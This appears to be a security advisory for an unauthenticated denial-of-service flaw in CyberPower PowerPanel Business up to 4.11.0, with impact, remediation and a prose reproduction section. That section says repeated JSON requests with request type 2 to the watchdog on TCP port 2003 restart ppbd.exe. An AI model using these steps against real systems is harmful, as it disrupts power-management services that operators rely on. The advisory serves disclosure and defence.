CyberPower PowerPanel Business Denial-of-Service Vulnerability via Unauthenticated Restart of ppbd.exe
Vulnerability
A denial-of-service vulnerability has been identified in CyberPower PowerPanel Business (PPB) versions through 4.11.0. The issue allows an unauthenticated remote attacker to disrupt the application by repeatedly restarting the ppbd.exe process. This is achieved through the PowerPanel Business Service Watchdog, which listens on TCP port 2003.
Impact
Exploitation of this vulnerability causes the ppbd.exe process to be repeatedly restarted, leading to a denial-of-service condition where the process becomes unavailable for legitimate use.
Reproduction
The vulnerability can be reproduced by sending a request to TCP port 2003 on the target host with a payload that includes a request type of 2 and a request string indicating a need to restart the application. This can be done using a network utility to send the crafted JSON payload.
Remediation
Users are advised to upgrade to CyberPower PowerPanel Business version 4.11.3 or later.
Vulnerability Rating
Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.